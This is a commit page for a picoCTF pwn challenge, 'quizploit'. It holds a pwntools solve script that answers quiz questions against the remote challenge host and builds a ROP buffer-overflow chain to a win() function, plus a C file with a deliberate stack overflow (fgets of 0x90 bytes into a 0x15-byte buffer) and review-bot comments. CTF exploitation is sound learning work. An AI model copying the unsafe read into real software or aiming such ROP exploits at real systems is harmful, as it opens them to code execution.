pwn/quizploit

2026-07-02 07:27:35 +09:00
parent 8237c807d2
commit 91c0fd7d66
4 changed files with 95 additions and 0 deletions
+1
@@ -0,0 +1 @@
picoCTF{dummy}
+70
@@ -0,0 +1,70 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "lonely-island.picoctf.net 54976".split()
def conn() -> remote:
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def answers(r: remote) -> None:
print('Q1')
r.sendlineafter(b">> ", b"64-bit")
print('Q2')
r.sendlineafter(b">> ", b"dynamic")
print('Q3')
r.sendlineafter(b">> ", b"not stripped")
print('Q4')
r.sendlineafter(b">> ", b"0x15")
print('Q5')
r.sendlineafter(b">> ", b"0x90")
print('Q6')
r.sendlineafter(b">> ", b"yes")
print('Q7')
r.sendlineafter(b">> ", b"fgets")
print('Q8')
r.sendlineafter(b">> ", b"win")
print('Q9')
r.sendlineafter(b">> ", b"buffer overflow")
print('Q10')
r.sendlineafter(b">> ", hex(0x90 - 0x15).encode())
print('Q11')
r.sendlineafter(b">> ", b"NX")
print('Q12')
r.sendlineafter(b">> ", b"ROP")
print('Q13')
r.sendlineafter(b">> ", hex(exe.symbols['win']).encode())
print('Q14')
result = r.recvline_contains(b"picoCTF{").decode().strip()
print(result)
r.close()
def main() -> None:
r = conn()
if args.REMOTE:
answers(r)
else:
offset = 40
rop = ROP(exe)
rop.raw(rop.generatePadding(0, offset))
rop.raw(rop.ret.address)
rop.win()
r.sendline(rop.chain())
print(r.recvall().decode(), end='')
r.close()
if __name__ == "__main__":
main()
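Review bot: `conn()` is annotated `-> remote` but returns a `process` when `args.REMOTE` is unset, and `answers()` takes the same annotation; both should name pwntools' common tube base class (`pwnlib.tubes.tube.tube`) instead. `answers()` closes `r` itself and `main()` then calls `r.close()` on the same object, so the close should live in one place only, e.g. only in `main()`. In the local branch `offset = 40` is an unexplained constant that presumably depends on how the committed `./vuln` build lays out `buffer[0x15]`; a comment such as `# buffer-to-return-address distance for the committed ./vuln build; re-derive if rebuilt` would make that dependency explicit. Indentation is not visible on this page, so the branch structure is read from the `if`/`else` lines alone.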
BIN
Binary file not shown.
+24
@@ -0,0 +1,24 @@
#include <stdio.h>
#include <stdlib.h>
/*
This is not the challenge, just a template to answer the questions.
To get the flag, answer all the questions.
There are no bugs in the quiz.
There are 0xD questions in total.
*/
void win(){
system("cat flag.txt");
}
void vuln(){
char buffer[0x15] = {0};
fprintf(stdout, "\nEnter payload: ");
fgets(buffer, 0x90, stdin);
}
void main(){
vuln();
}
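Review bot: `vuln()` passes `0x90` as the size to `fgets` while `buffer` holds only `0x15` bytes, so any longer input is written past the array on the stack. This is evidently the exercise's intended flaw, but the header comment describes only the quiz and does not mark the file as deliberately unsafe. A leading comment such as `/* Intentionally vulnerable CTF sample, not reference code; a bounded read is fgets(buffer, sizeof buffer, stdin). */` would keep it from being copied or built elsewhere by mistake. `void main()` is also non-standard C; `int main(void)` is the portable form if the file is ever rebuilt.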